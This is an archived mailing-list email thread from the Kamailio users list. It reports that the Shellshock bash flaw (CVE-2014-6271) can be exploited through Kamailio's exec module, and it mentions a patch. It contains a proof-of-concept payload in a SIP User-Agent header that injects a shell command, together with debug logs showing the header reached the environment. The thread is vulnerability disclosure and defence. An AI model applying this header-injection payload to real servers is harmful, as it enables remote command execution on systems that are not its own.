<html>
<head>
<meta content="text/html; charset=windows-1252"
http-equiv="Content-Type">
</head>
<body bgcolor="#FFFFFF" text="#000000">
OK, ignore my previous email then...<br>
<br>
Thanks again,<br>
Daniel<br>
<br>
<div class="moz-cite-prefix">On 25/09/14 16:51, Seudin Kasumovic
wrote:<br>
</div>
<blockquote
cite="mid:CAHbz3+2N8kUcNGxwT=NRG-SQErtRZvE3Ue6_UxDCMHo1PY+9JQ@mail.gmail.com"
type="cite">
<div dir="ltr">sorry, I attached wrong patch in previous post
<div><br>
</div>
<div>here is new with fixed body length comparison.</div>
</div>
<div class="gmail_extra"><br>
<div class="gmail_quote">On Thu, Sep 25, 2014 at 4:40 PM, Seudin
Kasumovic <span dir="ltr"><<a moz-do-not-send="true"
href="mailto:seudin.kasumovic@gmail.com" target="_blank">seudin.kasumovic@gmail.com</a>></span>
wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0
.8ex;border-left:1px #ccc solid;padding-left:1ex">
<div dir="ltr">Hi kamailio users,
<div><br>
</div>
<div>we are witnesses of new discovered bug in bash: Bash
Code Injection Vulnerability via Specially Crafted
Environment Variables (CVE-2014-6271) <a
moz-do-not-send="true"
href="https://access.redhat.com/node/1200223"
target="_blank">https://access.redhat.com/node/1200223</a></div>
<div><br>
</div>
<div>As exec module exports all SIP headers in environment
so it's was easy to push bash command.<br>
</div>
<div><br>
</div>
<div>There is attached simple kamailio test config file.</div>
<div>With sipp we sent header to output 123 into file
/tmp/123 like this:</div>
<div><br>
</div>
<div>User-Agent: () { :;}; echo 123 > /tmp/123<br>
</div>
<div>
<div><br>
</div>
<div>Debug output from kamailio is:</div>
<div><br>
</div>
<div>
<p>5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CONTENT_LENGTH=135</p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CONTENT_TYPE=application/sdp</p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_ALLOW=INVITE, ACK, CANCEL,
OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO,
PUBLISH</p>
<p><b> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_USER_AGENT=() { :;}; echo
123 > /tmp/123</b></p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_SUBJECT=Performance Test</p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_MAX_FORWARDS=70</p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CONTACT=<<a
moz-do-not-send="true"
href="http://sip:T00157@198.51.100.2:5060"
target="_blank">sip:T00157@198.51.100.2:5060</a>></p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CSEQ=1 INVITE</p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CALLID=<a
moz-do-not-send="true"
href="mailto:1-5394@198.51.100.2" target="_blank">1-5394@198.51.100.2</a></p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_TO=<a moz-do-not-send="true"
href="tel:%2B442033998806" value="+442033998806"
target="_blank">+442033998806</a> <sip:<a
moz-do-not-send="true" href="tel:%2B442033998806"
value="+442033998806" target="_blank">+442033998806</a>@orange.voip></p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_FROM=<a
moz-do-not-send="true" href="tel:%2B442033998833"
value="+442033998833" target="_blank">+442033998833</a>
<a class="moz-txt-link-rfc2396E" href="sip:T00157@orange.voip"><sip:T00157@orange.voip></a>;tag=5394SIPpTag001</p>
<p> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_VIA=SIP/2.0/UDP
198.51.100.2:5060;branch=z9hG4bK-5394-1-0</p>
<p> 5(30147) DEBUG: exec [exec_mod.c:175]:
w_exec_msg(): executing [/bin/true]</p>
</div>
<div>ls /tmp shows new created file !!!</div>
<div><br>
</div>
<div>I created simple patch to fix this issue in exec
module based on suggestion from RedHat until you fix
your bash what is recommended.</div>
<span class="HOEnZb"><font color="#888888">
<div><br>
</div>
-- <br>
Seudin Kasumovic<br>
<br>
</font></span></div>
</div>
</blockquote>
</div>
<br>
<br clear="all">
<div><br>
</div>
-- <br>
MSC Seudin Kasumovic<br>
Tuzla, Bosnia
</div>
<br>
<fieldset class="mimeAttachmentHeader"></fieldset>
<br>
<pre wrap="">_______________________________________________
SIP Express Router (SER) and Kamailio (OpenSER) - sr-users mailing list
<a class="moz-txt-link-abbreviated" href="mailto:sr-users@lists.sip-router.org">sr-users@lists.sip-router.org</a>
<a class="moz-txt-link-freetext" href="http://lists.sip-router.org/cgi-bin/mailman/listinfo/sr-users">http://lists.sip-router.org/cgi-bin/mailman/listinfo/sr-users</a>
</pre>
</blockquote>
<br>
<pre class="moz-signature" cols="72">--
Daniel-Constantin Mierla
<a class="moz-txt-link-freetext" href="http://twitter.com/#!/miconda">http://twitter.com/#!/miconda</a> - <a class="moz-txt-link-freetext" href="http://www.linkedin.com/in/miconda">http://www.linkedin.com/in/miconda</a>
Next Kamailio Advanced Trainings 2014 - <a class="moz-txt-link-freetext" href="http://www.asipto.com">http://www.asipto.com</a>
Sep 22-25, Berlin, Germany</pre>
</body>
</html>